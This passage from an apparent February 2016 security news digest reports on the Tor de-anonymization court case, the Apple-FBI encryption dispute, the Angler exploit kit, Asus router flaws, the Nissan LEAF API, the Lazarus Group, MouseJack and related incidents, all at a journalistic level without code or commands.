This means that the SEI research was funded by the DoD and not by the FBI.
Court documents confirmed that the experts at the Carnegie Mellon university had helped the law enforcement to de-anonymize suspects.
The evidence of the collaborations between the FBI and the Carnegie Mellon University has emerged also in a stand trial in federal court in Seattle in November 2015. The court was discussing the case of Brian Farrell, an alleged Silk Road 2 lieutenant, under investigation of the law enforcement that discovered his IP addresses belong to the suspect. A new filing in Farrell’s case states that a “university-based research institute” supported the investigation and helped the feds to de-anonymize Farrell.
According to a Homeland Security search warrant, between January 2014 and July 2014 a “source of information” provided law enforcement “with particular IP addresses” that had accessed the vendor side of Silk Road 2.
The Farrell’s advocates filed a motion asking the prosecution to provide further information on the involvement of the Carnegie Mellon researchers in the investigation and the hacking technique used to de-anonymize suspects.
The response of a federal judge was negative, the magistrate denied the motion this week explaining that authorities had not violated the Fourth Amendment rights identifying the suspects via their IP addresses.
“SEI’s identification of the defendant’s IP address because of his use of the Tor network did not constitute a search subject to Fourth Amendment scrutiny. “
The judge confirmed that the identity of the suspects was identified by exploiting security vulnerabilities in the Tor network.
The Carnegie Mellon University always denied having received money for their research.
Apple is working on New iPhone Even It Can't Hack
25.2.2016 Apple
Amid an ongoing dispute with the United States government over a court order to unlock iPhone 5C of one of the San Bernardino shooters Syed Farook…
...Apple started working on implementing stronger security measures "even it can't hack" to achieve un-hackability in its future iPhones.
The Federal Bureau of Investigation (FBI) is deliberately forcing Apple to create a special, backdoored version of iOS that could let them brute force the passcode on Farook's iPhone without erasing data.
However, the FBI approached the company to unlock the shooter's iPhone 5C in various ways like:
Create a backdoor to shooter's iPhone.
Disable the Auto-destruct feature after numerous tries.
Increase the brute force time to try out all combinations.
Minimize the time of waiting for a window after each try.
..and much more
Apple is still fighting the battle even after the clear refusal to the court that it will not provide any backdoor access to the agency that would affect its users’ privacy and security in near future.
New iPhones will be Unhackable
Apple has taken this sensitive issue on top priority in their stack to solve the privacy and security of public by covering any existing way out (if any).
According to the New York Times, Apple is working on new security measures that would prevent the governments or federal enforcements from using passcode bypassing techniques to access iPhones or any iOS devices in the future.
This breakthrough would ensure that the upcoming Apple products would not be subjected to any susceptibility by any means.
In short, the main highlight of this move is that even Apple could not be able to intercept into their customer data whether it is for criminal identification demand from FBI or any government spying agency like NSA.
In San Bernardino shooter's case, Apple helped the FBI in every possible way by providing iCloud Backup of Farook and suggesting other alternative ways to view his iPhone data.
But, Apple refused to the FBI Request and Californian Judge demands for the backdoor creation in order to pull out the terrorist data from iPhone 5C.
"The only way we know would be to write a piece of software that we view as sort of the software equivalent of cancer. We think it's bad news to write. We would never write it. We have never written it," stated Apple CEO Tim Cook in an interview.
Government wants Apple to Unlock 12 More iPhones
As Cook's statement has a silent underlined meaning that the company could write a code snippet exclusively for this device to make a breakthrough in Farook's case.
But if Apple agrees to one request, then the company would be flooded by the FBI and the CIA requests to unlock more iPhones of criminals in near future.
The recent request made by the United States government to unlock 12 more iPhones is just a starter of the above-explained scenario.
Tech biggies like Google, Facebook, and WhatsApp, has favored Apple's decision regarding the User Privacy, but the politicians like Presidential Candidate Donald Trump criticized the Apple's decision, making a controversial statement to "Boycott Apple" on Twitter.
The looping requests of the FBI, battles in Social Medias and much more controversies made Apple rethink about the security of their future products. And since the company doesn't want to fly in the face of danger, it decided to bolster the security in its forthcoming iPhone releases.
Author of the Angler EK integrated recently Silverlight exploit
25.2.2016 Exploit
The security researcher Kafeine confirmed that the authors of the Angler EK have integrated the exploit for a recently patched Microsoft Silverlight vulnerability.
Ransomware is becoming one of the most dreaded cyber threats for netizens, security experts noticed a surge in the number of cyber attacks aimed to spread malware like Cryptowall and TeslaCrypt. Exploit kits like the Nuclear EK and the Angler EK are the privileged vectors to serve this specific family of malware, cyber criminals constantly improve their code in order to compromise the largest possible number of victims.
The security expert Kafeine has recently discovered that the authors of the Angler EK have added the code of a Silverlight exploit leveraging on the CVE-2016-0034 vulnerability.
The flaw was fixed by Microsoft in January with the MS16-006 critical bulletin, an attacker can exploit it for remote code execution. The Silverlight flaw discovered by the experts in Kaspersky Lab as a result of an investigation on the Hacking Team arsenal disclosed in July 2015.
According to Microsoft, the remote code execution vulnerability can be exploited by an attacker that set up a website to host a specially crafted Silverlight application.
When Microsoft users will visit the bogus website, the exploit will allow an attacker to obtain the same permissions as the victim.
On February 18, 2016, Kafeine noticed that the author behind Angler had added code for the Silverlight exploit, according to the expert the integration was completed on February 22.
Anton Ivanov, a senior malware researcher at Kaspersky confirmed that an exploit for the Silverlight exploit has been integrated to the Angler EK.
Kafeine explained that the CVE-2016-003 exploit has been used to spread a variant of the TeslaCrypt ransomware, the attacks works only with Silverlight version previous the current one, Silverlight 5.1.41212.0.
Angler EK dropping Teslacrypt via silverlight 5.1.41105.0 after the “EITest” redirect 2016-02-22 (Kafeine blog post)
The experts at Ars Technica who analyzed the HAcking Team’s leaked emails noticed communications between a Russian developer named Vitaliy Toropov and the staff of the Hacking Team.
The man sold an Adobe Flash Player exploit to the Hacking Team for $45,000 in 2013 and also offered a Silverlight exploit.
“Now your discount on the next buy is -5k and -10k is for a third bug. I recommend you the fresh 0day for iOS 7/OS X Safari or my old Silverlight exploit which was written 2.5 years ago and has all chances to survive further in next years as well. ” Toropov wrote to Hacking Team member Giancarlo Russo.
Experts at Kaspersky started analyzing Toropov’s exploits, including a Silverlight Microsoft Silverlight Invalid Typecast / Memory Disclosure that was dated back 2013 and that he had published.
Kaspersky issued a YARA rule to detect the exploit in the wild, and on November 25th, the company detected the Toropov’s exploit on a user’s machine. Later another sample of the exploit was uploaded from Laos to a multiscanner service.
“After implementing the detection, we waited, hoping that an APT group would use it. Since Vitaliy Toropov was offering it to Hacking Team, we also assumed that he sold it to other buyers, and what good is a zero-day if you don’t use it? Unfortunately, for several months, nothing happened. We had already forgotten about this until late November 2015.” Kaspersky researchers wrote in a blog post. “On November 25th, one of our generic detections for Toropov’s 2013 Silverlight exploit triggered for one of our users. Hours later, a sample was also uploaded to a multiscanner service from Lao People’s Democratic Republic (Laos).”
The analysis of the exploit revealed that the exploit was compiled on July 21, 2015, after the Hacking Team data was leaked online. Kaspersky immediately reported the existence of the exploit to Microsoft.
It’s unclear if this Silverlight exploit is the same offered by Toropov in 2013,
“One of the biggest questions we have is whether this is Vitaliy Toropov’s Silverlight zero-day which he tried to sell to Hacking Team. Or is it a different one? Several things make us think it’s one of his exploits, such as the custom error strings. Of course, there is no way to be sure and there might be several Silverlight exploits out there. One thing is for sure though – the world is a bit safer with the discovery and patching of this one.” wrote Kaspersky researchers.
Judge Confirms Government Paid CMU Scientists to Hack Tor Users for FBI
25.2.2016 Hacking
Everything is now crystal clear:
The security researchers from Carnegie Mellon University (CMU) were hired by the federal officials to discover a technique that could help the FBI Unmask Tor users and Reveal their IP addresses as part of a criminal investigation.
Yes, a federal judge in Washington has recently confirmed that the computer scientists at CMU's Software Engineering Institute (SEI) were indeed behind a hack of the TOR project in 2014, according to court documents [PDF] filed Tuesday.
In November 2015, The Hacker News reported that Tor Project Director Roger Dingledine accused the Federal Bureau of Investigation (FBI) of paying the CMU, at least, $1 Million for providing information that led to the criminal suspects identification on the Dark Web.
After this news had broken, the FBI denied the claims, saying "The allegation that we paid [CMU] $1 Million to hack into TOR is inaccurate."
Meanwhile, the CMU also published a press release, saying the university had been subpoenaed for the IP addresses it obtained during its research.
The revelation came out as part of the ongoing case against Brian Richard Farrell, an alleged Silk Road 2 lieutenant who was arrested in January 2014. It has emerged that the federal officials recruited a "university-based research institute" that was running systems on the Tor network to help authorities uncover the identity of Farrell.
University Researchers Helped FBI Hack TOR
Now, a recent filing in one of the affected criminal cases has confirmed both the name of the "university-based research institute" and the existence of a subpoena.
Some earlier allegations by the TOR project seem to be wrong. The research was funded by the Department of Defense, which was later subpoenaed by the FBI.
Here's what the Tuesday court order, by US District Judge Richard Jones, filed in the case of Farrell reads:
"The record demonstrates that the defendant's IP address was identified by the Software Engineering Institute (SEI) of Carnegie Mellon University (CMU) when SEI was conducting research on the Tor network which was funded by the Department of Defense (DOD)."
"Farrell's IP address was observed when SEI was operating its computers on the Tor network. This information was obtained by law enforcement pursuant to a subpoena served on SEI-CMU."
Farrell is charged with conspiracy to distribute drugs like cocaine, heroin, and methamphetamine through the Silk Road 2.0 dark web marketplace.
$1.73 Billion to UnMask TOR Users?
Last summer, the DoD renewed a contract worth over $1.73 Billion with the SEI, which according to CMU, is the only federally funded research center that focus on "software-related security and engineering issues."
Carnegie Mellon University's SEI came under suspicion for the TOR hack due to the sudden cancellation of the talk from SEI researchers Michael McCord and Alexander Volynkin on de-anonymizing Tor users at Black Hat 2014 hacking conference.
More details on the matter are still unclear, but the judge confirmed few facts about the TOR and stated that "Tor users clearly lack a reasonable expectation of privacy in their IP addresses while using the Tor network."
Asus Faces 20 years of Audits Over Poor Wi-Fi Router Security
25.2.2016 Safety
Currently, Asus is undergoing through a troublesome situation after a lawsuit had been filed by the US Federal Trade Commission (FTC) regarding its Router Insecurity.
On Tuesday, FTC settled charges with Asus, where the hardware manufacturing company agrees to:
Undergo Independent Security Audits Once in 2 years, for the Next 2 Decades.
This action had been taken as the result of security negligence in Asus Wireless Routers that put the home and corporate networks of hundreds of thousands of consumers at risk.
If Asus is found to violate the agreement, the company could end up paying a civil penalty of up to $16,000 for each violation.
Asus Router Security Blunders
Since Asus markets its products under the label of Secure and Intelligent routers through its website, following flaws would splash its level of security and intelligence.
1. Default Username & Password: ADMIN
In 2014, a serious security issue had been brought to the public regarding the default password of Asus products. It was discovered that Asus had been shipping their routers with both Username and Password fields with "default" as preset.
Even a script kiddie with this predictable credential could gain the unauthorized access to any router and hack into victim’s network. In 2014, many Asus routers were compromised in such a manner.
Additionally, Asus did not bother to notify its customers to change the default usernames and passwords in order to maintain the security and privacy of their network.
2. Easily Hackable Router Admin Panel
During the investigation, the FTC uncovered that nearly all the security measures taken by Asus had been dodged.
One of the prevalent security vulnerability uncovered that allowed hackers to gain the admin panel and disable the security settings via the web interface.
3. Asus AiCloud & AiDisk Vulnerable to Remote Hacking
"Security Negligence" episodes of Asus are not yet over.
The cloud service offered by Asus named AiCloud and AiDisk also suffered from the critical vulnerabilities that allowed an attacker to access your Hard Disk remotely from any part of the world, resulting in complete system compromise.
AiCloud offers the customer to browse through the files (in a cloud) that facilitate users to use it as a mini-cloud after plugging the USB Hard drive into the router.
Man-in-the-Middle (MITM) attacks were easy to get executed in between because the login details were unencrypted during the transmission.
The issue had been reported back in January 2014, but ASUS did not advise its users to upgrade their firmware after patching up the vulnerability, which shows the clear case of negligence.
4. 'Check for Upgrades' is an Illusion
Regular updates are usually a vulnerability killer in all aspects. But it is different in the case of Asus.
According to the collective reports, FTC found that the button named "Check for Upgrades" is just a dummy without any special functions embedded.
It is believed that the administrators did not import the latest patches into the Upgrade database; making it available for its users via push; whenever a user scans for any notifications.
In short, hackers are licensed to mess with the security features of any Asus routers; hence after making an ice cake entry to the filthy admin policies of Asus Routers.
The FTC isn't just unhappy about ASUS's bogus security claims, but it’s also unhappy with the company's response time.
All the complaints under a nutshell are enough to figure out the laxity in security measures taken by Asus.
Internet of Thing (IoT) Devices at Risk
This situation of hallucinated security would become even worse when Internet of Thing (IoT) devices are compromised. Since routers are the gateway to the IoT devices, an attacker could easily execute the self-defined commands to those devices.
Jessica Rich, Director of the FTC's Bureau of Consumer Protection, says:
"The Internet of Things is growing by leaps and bounds, with millions of consumers connecting smart devices to their home networks. Routers play a key role in securing those home networks, so it's critical that companies like ASUS put reasonable security in place to protect consumers and their personal information"
Asus made it very clear to follow the right path: To notify the users whenever any update is available and also provide appropriate instructions to protect its users.
The disclosure of these silly vulnerabilities is just an eye-opener for other Router vendors to buckle up the security of themselves as well as their customers.
The weaknesses mentioned above in ASUS products came into the limelight in 2014, but after a month, 300,000 home and mini routers manufactured by D-Link, Micronet, Tenda, TP-Link, and others had been compromised by the same methods.
Remotely hacking a Nissan LEAF via vulnerable APIs
25.2.2016 Hacking
The security expert Troy Hunt discovered that it is possible to remotely control features of a Nissan Leaf via API.
The popular security expert Troy Hunt discovered a security vulnerability affecting the API implemented by Nissan to manage the LEAF cars from a mobile device. Other experts have confirmed the existence of the flaw, the vulnerability had been discussed publicly on a French-language forum since December.The vulnerability could be exploited by hackers to remotely manage some features of the popular electric car.
The vulnerability could be exploited by hackers to remotely manage some features of the popular electric car.
Nissan provided both Android and iOS applications to remotely manage the vehicle from a mobile device.
Hunt was at a workshop held Norway when one of his students owning a Nissan LEAF reported that the app for iOS was using only the Vehicle Identification Number (VIN) to authenticate users. The knowledge of the Nissan LEAF’s VIN could allow attackers to control air conditioning and access driving data, including power consumption and travel distance.
The analysis of the API revealed the possibility to access them without any kind of authentication.
Hunt conducted a series of tests with the support of the researchers Scott Helme that demonstrated how to take control of the vehicle remotely. An attacker could exploit the flaw to turn on the AC of a parked car draining its battery, but the Australian expert Troy Hunt confirmed that it is not possible to remotely control the engine neither lock or unlock the vehicle.
How to obtain a target’s VIN?
Hunt explained that all the Nissan LEAF vehicles he analyzed have the same VIN, except for the last five digits. An attacker can try all possible combinations of these digits to send commands to the vehicle.
Hunt reported the issue to Nissan on January 23, but a vulnerability is still unpatched. Waiting for the fix, users can disable the service from the configuration menu.
Operation Blockbuster revealed the Lazarus Group Activities
25.2.2016 Hacking
The Operation BlockBuster Coalition has disclosed the results of its investigation on the activities of the Lazarus Group that is believed to be behind the Sony Pictures hack.
State-sponsored hackers allegedly behind the Sony Pictures hack have been linked to other security breach suffered by a number of companies in South Korea.
The FBI blamed the North Korea, the Bureau released the findings of its investigation that indicated the involvement of the Government of Pyongyang in the Sony Hack.
“As a result of our investigation, and in close collaboration with other US Government departments and agencies, the FBI now has enough information to conclude that the North Korean government is responsible for these actions,” the FBI said Friday in a statement.
The US law enforcement suspect the involvement of the North Korea’s Unit 121, which is the group of hackers working under the direction of the General Bureau of Reconnaissance.
Experts at Kaspersky have linked the group to the hacking operations Dark Seoul and Operation Troy. According to Kaspersky the hacking crew has been active since at least 2009 and is still operating undercover.
Kaspersky Lab, alongside with a number of security firms including Novetta, AlienVault, Invincea, ThreatConnect, Volexity, Symantec, and PunchCyber have published reports related to the activities of the Lazarus Group.
The group of security firms formed an alliance called Operation Blockbuster that issued the detection signatures to neutralize the hacking tools used by the APT.
The Lazarus Group ’s arsenal includes the Destover wiper malware, the same used against the systems of the Sony Pictures Entertainment.
“The group deployed multiple malware families throughout the years, including malware associated with Operation Troy and DarkSeoul, the Hangman malware (2014-2015) and Wild Positron / Duuzer (2015). The group is known for spearphishing attacks, which include CVE-2015-6585, which was a zero-day vulnerability at the time of discovery.” states a report published on SecureList.
Researchers at Kaspersky Lab revealed that the Lazarus Group’s malware is mostly custom-tailored and appears highly sophisticated.
The activity of the Lazarus Group surged in 2014 and 2015, the experts of the firm composing the Operation Blockbuster team noticed a number of similarities across a number of attacks worldwide.
The researchers discovered that malware used in the attacks linked to the Lazarus Group reused several components, including at least six user-agents.
“Studying multiple coding quirks within any given malware variant actually revealed these to be coding conventions implemented across both different malware families as well as entirely new samples. A simple example of code reuse is the networking functionality that includes a half-dozen hard-coded user-agents with the misspelling ‘Mozillar’ instead of Mozilla.” states the post.
The experts also noticed other similarities in the modus operandi of the threat actors, such as the use of BAT files to delete malware pieces after infections and the password reuse in the malware droppers.
“These BAT files are generated on the fly and, while they serve their purpose of eliminating initial infection traces, they ironically double as a great way to identify the malware itself by honing in on the path-placeholder strings that generate the randomly-named BAT files on the infected systems,” Kaspersky Lab said in its report. “A high-confidence indicator of correlation is the reuse of a shared password across malware droppers used to drop different malware variants. The droppers all kept their payloads within a password-protected ZIP under the resource name ‘MYRES’. The dropper contains the hardcoded password ‘!1234567890 dghtdhtrhgfjnui$%^^&fdt‘ making it trivially easy for an analyst to reach the payload. “
The researchers confirmed that the group is still active and is currently working to new weapons to add to its arsenal.
Just One Device? No, Government wants Apple to Unlock 12 More iPhones
24.2.2016 Apple
Until now, the FBI is asking for Apple's help in unlocking the iPhone belonging to one of the terrorists in the San Bernardino shootings that killed 14 and injured 24 in December.
However, in addition to iPhone 5C belonged to San Bernardino shooter Syed Farook, the U.S. Justice Department is looking at court orders forcing Apple to help officials unlock at least 12 iPhones.
Citing sources, the Wall Street Journal reported that the federal authorities want to extract data from iPhones seized in a variety of criminal investigations are involved in undisclosed cases where prosecutors are compelling Apple to help them bypass iPhone's lockscreen.
Although more details of these cases are not yet publicly disclosed, these dozen or so cases are all distinct from San Bernardino shooter's case and involve many iPhones using an older iOS version that has fewer security barriers to bypass.
Also Read: Police Reset Shooter's Apple ID that leaves iPhone Data Unrecoverable.
However, Apple is fighting government demands in all these cases and, in a number of cases, had objected the US Justice Department's efforts to force its company through an 18th-century law called the All Writs Act, according to which, the courts can require actions to comply with their orders.
Bill Gates wants Apple to Help the FBI
Apple's refusal to unlock iPhone linked to one of the San Bernardino shooters has escalated a battle between the technology company and the U.S. Federal Bureau of Investigation.
Although many Big Fishes in Technology industry including Facebook, WhatsApp, and Google supported Apple's stand, many politicians including Donald Trump have criticized and opposed Apple.
...and the latest in the opposition of Apple's decision is Microsoft co-founder, Bill Gates.
"Nobody's talking about a backdoor," Gates told Financial Times. "This is a specific case where the government is asking for access to information. They are not asking for some general thing, they are asking for a particular case."
However, in a separate interview later Tuesday with Bloomberg, Gates said he was "disappointed" with headlines based on the FT report claiming that he supported the FBI in its ongoing battle with Apple, saying "that does not state my view on this."
In past, Microsoft had collaborated closely with the US government agencies to allow its users' communications to be intercepted.
Microsoft helped the NSA (National Security Agency) to circumvent its own encryption and built a series of backdoors into Outlook.com, Skype, and SkyDrive to ease difficulties in accessing online communications, according to documents leaked by Edward Snowden.
Mother of San Bernardino Victim Supports Apple
Though the FBI, DoJ, and politicians like Donald Trump are unable to understand the importance of privacy, a mother who lost his son in San Bernardino, California terrorist attack last December says, Right to Privacy 'makes America great.'
Also Read: Now We Know – Apple Can Unlock iPhones, Here's How to Hack-Proof your Device.
Carole Adams, whose son Robert was killed in the terrorist attack last year, has supported Apple's stand on encryption and said the company is within their rights to protect the privacy of all United States citizens.
The battle between Apple and the FBI, in which the agency is asking the company to create a backdoored version of iOS for unlocking the shooters' iPhone 5C, is taking new twists and turns every day, so let's see who wins.
How to Hack a Computer from 100 Meters by Hijacking its Wireless Mouse or Keyboard
24.2.2016 Hacking
No matter how secure you think your computer might be, something malicious can always happen. As a Computer is an open book with right tools and talent.
The same is proved by a group of security researchers by hacking into a computer with no internet, and no Bluetooth devices.
Yes, it is possible for attackers to Hack Your Computer through non-Bluetooth devices such as your wireless mouse and keyboard and install Malware or Rootkit onto your machine.
That innocent-looking tiny dongle plugged into your USB port to transmit data between your wireless mouse, and the computer is not as innocent as it pretends to be.
What's the Vulnerability?
Security researchers from the Internet of things security firm Bastille have warned that wireless keyboards and mice from seven popular manufacturers including Logitech, Dell, Microsoft, HP and Lenovo are…
…vulnerable to so-called MouseJack attacks, leaving Billions of computers vulnerable to hackers.
The flaw actually resides in the way these wireless mice and their corresponding radio receivers handle encryption.
The connection between the tiny dongle and the mouse is not encrypted; thus, the dongle would accept any seemingly valid command.
How to Hijack Wireless Mouse and Hack Computer?
Wireless mice and keyboards communicate via radio frequency with a USB dongle inserted into the PC. The dongle then sends packets to the PC, so it follows the mouse clicks or keyboard types.
While most wireless keyboard manufacturers encrypt traffic between the keyboard and the dongle in an effort to prevent spoofing or hijacking of the device.
However, the mice tested by Bastille did not encrypt their communications to the dongle, allowing an attacker to spoof a mouse and install malware on victim's PC.
With the use of around $15-$30 long-range radio dongle and a few lines of code, the attack could allow a malicious hacker within 100 meters range of your computer to intercept the radio signal between the dongle plugged into your computer and your mouse.
The hacker can, therefore, send packets that generate keystrokes instead of mouse clicks, allowing the hacker to direct your computer to a malicious server or website in mere seconds.
During their tests, researchers were able to generate 1000 words/minute over the wireless connection and install a malicious Rootkit in about 10 seconds. They tested several mice from Logitech, Lenovo, and Dell that operate over 2.4GHz wireless communications.
Video Demonstration of MouseJack Attack
Who are Affected?
The following is the list of the wireless keyboard and mouse manufacturers whose non-Bluetooth wireless devices are affected by the MouseJack flaws:
Logitech
Dell
HP
Lenovo
Microsoft
Gigabyte
AmazonBasics
Billions of PC users with wireless dongles from any of the above manufacturers are at risk of MouseJack flaw. Even Apple Macintosh and Linux machine users also could be vulnerable to the attack.
These mice are separate from Bluetooth mice that are not affected by this security issue.
Many Wireless Devices will Never Receive any Patch
The researchers have already reported the security issue to all the seven manufacturers, but as of today, only Logitech has released a firmware update that blocks MouseJack attacks.
However, there are a wide number of cheaper mice that don't have updatable firmware, due to which all of them will remain vulnerable forever, which could be a major issue in business environments where peripherals are often utilized for several years before being replaced.
Although Lenovo, HP, Amazon, and Gigabyte did not comment, a Dell spokesperson advised the users of the KM714 keyboard and mouse combo to get the Logitech firmware patch via Dell Tech Support and the KM632 Combo users to replace their devices.
Here's the list of affected devices, so if you are using one of them, it might be time to check for updates, and if not available, replace your existing peripheral.
For more in-depth knowledge, you can refer this white paper explaining technical details.
Anonymous hacked the France’s Ministry of Defense portal CIMD (Centre d’Identification des Materiels de la Defense)
24.2.2016 Hacking
Anonymous hacked the CIMD portal managed by the France’s Ministry of Defense to protest against French foreign arms trade operations.
The Anonymous collective has hacked one of the websites managed by the France’s Ministry of Defense, the CIMD (Centre d’Identification des Materiels de la Defense). The hacktivists accessed the database and leaked it online to protest against the country’s foreign arms trade operations.
Anonymous accuses the French Government of selling weapons to repressive regimes like the Saudi Arabia. The France authorities are also responsible accused by Anonymous of using surveillance and hacking tools, as demonstrated by the documents leaked by Wikileaks following the hack of the surveillance firm Hacking Team.
The incident was disclosed on February 22 by Anonymous, the users were
A “Our web portal will be temporarily unavailable due to maintenance actions” message was displayed to the users of the CIMD portal.
Hackers leaked online the database dump containing sensitive information, including army supplier data and partners information, alongside with login and FTP credentials and PHP sessions.
The archive includes usernames paired with cleartext passwords.
As proof of the hack, Anonymous also leaked the pictures of the CIMD admin panel, experts that visioned the images speculate the web portal was running a dated CMS.
“As a side note, after testing the vast majority of CMSs listed in Softpedia’s Webscripts section, I can say that the army’s portal looks like a very old content management platform, if not one custom made just for France’s Ministry of Defense.” wrote Catalin Cimpanu in a blog post published by Softpedia.
Anonymous highlighted the presence of a series of press articles in the CIMD archive that report the foreign arms trade operations of the French Government.
Anonymous also shared the link to report published by Amnesty International in 2012 that listed France as the world’s second largest arms trader.
Below the links to the leaked data
Operation Dust Storm, hackers Target Japanese Critical Infrastructure
24.2.2016 Hacking
Japanese commercial and critical infrastructure organizations have been targeted a long-running campaign dubbed Operation Dust Storm.
Security firm Cylance have uncovered a long-running hacking campaign dubbed ‘Operation Dust Storm’ targeting commercial and critical infrastructure organizations in Japan.
Threat actors behind the Operation Dust Storm have been active since at least 2010, the hackers targeted several organizations in Japan, South Korea, the US, Europe, and other Asian countries.
Experts believe that the group is well-organized and well-funded, a circumstance that lead the researchers to speculate the involvement of a nation-state actor.
The researchers at Cylance revealed that the threat actors started focusing on Japanese organizations since 2015, they hackers breached networks of Japanese organizations in the electricity generation, oil and natural gas, transportation, finance, and construction industries.
The list of victims includes an automaker, the Japanese subsidiary of a South Korean electric utility firm, and an oil and gas company.
The hackers demonstrated the availability of unique backdoors and zero-day exploits in their arsenal, used to launch watering holes and spear phishing attacks. In a number of attacks conducted in May 2015, the group also used several Android backdoors against targets in South Korea and Japan.
Fortunately the attacks launched by the group behind Operation Dust Storm were not sophisticated. The researchers spotted the group in 2011, when the hackers relied on Adobe Flash Player (CVE-2011-0611) and Internet Explorer (CVE-2011-1255) zero-day vulnerabilities to deliver a strain of malware dubbed Misdat.
“Very little public information was available throughout 2010 on this threat, despite the group’s primary backdoor gaining some level of prominence in targeted Asian attacks” states the report published by Cylance “It wasn’t until June 2011 that Operation Dust Storm started to garner some notoriety from a series of attacks which leveraged an unpatched Internet Explorer 8 vulnerability, CVE-2011-1255, to gain a foothold into victim networks. “
In October 2011, the hackers targeted gathering intelligence about the Libyan crisis following the death of Muammar Gaddafi. In 2012, the group leveraged the Internet Explorer zero-day (CVE-2012-1889) for their cyber espionage campaigns.
Experts at Cylance noticed a significant reduction of the Operation Dust Storm in March 2013, after the publication of the Mandiant’s analysis of the Chinese APT group dubbed APT1.
In February 2014 the group behind Operation Dust Storm appeared again, it launched a series of attacks leveraging a new Internet Explorer zero-day exploit (CVE-2014-0322) used in watering hole attacks.
The researchers at Cylance have no doubts, the attacks against Japanese critical infrastructure will rapidly increase in the future.
“However, our team believes that attacks of this nature on companies involved in Japanese critical infrastructure and resources are ongoing and are likely to continue to escalate in the future.” Cylance concluded.
Use of acid and lasers to access data stored on iPhones
24.2.2016 Apple
While Apple is refusing to support the FBI in the case of San Bernardino shooter Snowden says the FBI can use decapping technique to crack iPhones.
Over the last days, there is a huge discussion between Apple and FBI in relation to the access to San Bernardino terrorist Syed Farook’s iPhone. FBI demand to hack the phone so the agency obtains full access to the Farook’s iPhone data with Apple’s assistance; however Apple rejects the demand backing it up by the idea of protection of the privacy of all iPhone users. Moreover, Apple publicly announced its dismiss of the court order since the provision of such access would generate a backdoor into Apple products which in turns would provide unrestricted access to experts and criminals to Apple customer data, thus open opportunity of spying on Apple users in terms of intercepting phone calls, text messages and tracking their location through GPS.
The current debate has merged into an argument regarding the Apple digital rights and protection of privacy of its clients against the FBI argument concerning Farook’s possible links to terrorist networks as well as future prevention of terrorist plots declaring that security and justice are more significant concerns in comparison to privacy (Ghosh, 2016).
In accordance with FBI statements the access to the San Bernardino terrorist Syed Farook’s iPhone 5c data is only possible through the Apple assistance in terms of creating a backdoor due to the fact that FBI had already tried other methods such as returning the iPhone to its home Wi-Fi network aiming at backing up automatically San Bernardino perpetrator’s data to the iCloud but unsuccessfully because Farook seemed to have disabled the automatic update function. Another FBI’s unsuccessful technique is associated with the attempt to access Farook’s iCloud account through resetting his Apple ID; however the resetting provoked Apple Security Measure which averted the backup of the iPhone data.
But Edward Snowden, former NSA whistleblower thinks otherwise. According to him FBI is not limited only to this way to access Farook’s iPhone 5c content, but instead, FBI can rely on the use of acid and lasers to access the iPhone data with no need of Apple to hack the iPhone.
“The problem is, the FBI has other means… They told the courts they didn’t, but they do. The FBI does not want to do this,” said Snowden“
The mechanism proposed by Snowden is well-known as „chip decapping” (Ghosh, 2016).
Process of chip decapping
Chip decapping is a method during which the main processor chip is physically processed to extract its contents. The first step is the use of acid to get rid of the chip’s encapsulation followed by a laser drill down into the chip with the purpose of displaying the share of the memory which comprises the iPhone’s distinctive ID so-called UDID data.
The next step involves the placement of tiny probes on the spot where the data is, in order to display gradually the UDID and the algorithm utilized to resolve it. After the extraction of the information, the FBI is enabled to transfer it to a super computer so the missing passcodes can be recovered through trying all probable combinations whereas one unlocks the phone data. Furthermore, due to the fact that the mechanism is implemented outside the iOS the danger that the data will be wiped out or self-destruct is limited. Of course, this method also has weaknesses, and the most significant one is the occurrence of a minor mistake during the implementation of the method can lead to chip destruction which in turns means that all access to the phone’s data will be permanently lost (Goodin, 2016).
Infrared laser glitching
During an interview with an independent researcher conducted by the media (ABC News), the decapping technique was discussed so the interviewee shared his/her opinion that this method will have doubtful success against an iPhone and it’s likely to result in permanent loss of the content.
In addition, the interviewee suggested that the use of infrared laser glitching would be a better option because the chance to lose the data is slightly reduced. The method is associated with the slight piercing of the chip followed by getting access to UID data through an infrared laser (Goodin, 2016).
Furthermore, this particular method proved to be effective in the past by the hardware hacker Chris Tarnovsky who conducted an attack which led to damage on the microcontroller disabling the lockdown of Xbox 360 game console. To perform his attack, Tarnovsky used an electron microscope, well-known as ion beam workstation which enabled him to examine the chip in terms of nanometer scale. As a result, he had the ability to manipulate and control its individual wires utilizing microscopic needles. Therefore, such methods are technically doable against an iPhone but these methods lack the practicality due to the fact that the degree of destroying forever the hardware is significantly high and the use of these mechanisms is immensely high (Goodin, 2016).
The federal magistrate judge has ordered Apple to produce software which will be able to work against all older iPhones which lack modifications. This new software will provide the possibility of updating even when an iPhone has used “secure enclave” protections, in other words the software will have functions to bypass secure enclave protections. The only thing that Apple is required to do is to change the digital signature on very little cost thus the software will be able to run on different devices (Goodin, 2016).
IRS is warning taxpayers of a new surge in tax-related incidents
23.2.2016 Incindent
It is a nightmare for taxpayers according to an IRS bulletin there is a 400 percent surge in tax-related phishing and malware incidents.
This year the IRS already reported 1,026 malware and phishing incidents, compared to 254 this time last year.
The IRS is warning taxpayers of newer forms of attacks aiming victims into disclosing credentials to third-party tax preparation service accounts.
“The Internal Revenue Service renewed a consumer alert for e-mail schemes after seeing an approximate 400 percent surge in phishing and malware incidents so far this tax season.” states the bulletin. “The emails are designed to trick taxpayers into thinking these are official communications from the IRS or others in the tax industry, including tax software companies. The phishing schemes can ask taxpayers about a wide range of topics. E-mails can seek information related to refunds, filing status, confirming personal information, ordering transcripts and verifying PIN information.”
The IRS Commissioner John Koskinen used the adjective “dramatic” to describe this surge in tax-related incidents inviting taxpayers to watch out for scammers.
“This dramatic jump in these scams comes at the busiest time of tax season,” said Koskinen. “Watch out for fraudsters slipping these official-looking emails into inboxes, trying to confuse people at the very time they work on their taxes. We urge people not to click on these emails.”
IRS building
Threat actors are very interested in using the tax season as a lure, in a common attack scenario victims receive an email containing links to the domain used to serve malware. In other cases, the attackers used emails with attachments that include documents embedding malicious macros. Once the victims open the document, the macro drops a malware on the victim’s machine, including dreaded ransomware like CryptoLocker, TeslaCrypt and Locky.
These are the alarming statistics provided by the IRS:
There were 1,026 incidents reported in January, up from 254 from a year earlier.
The trend continued in February, nearly doubling the reported number of incidents compared to a year ago. In all, 363 incidents were reported from Feb. 1-16, compared to the 201 incidents reported for the entire month of February 2015.
This year’s 1,389 incidents have already topped the 2014 yearly total of 1,361, and they are halfway to matching the 2015 total of 2,748.
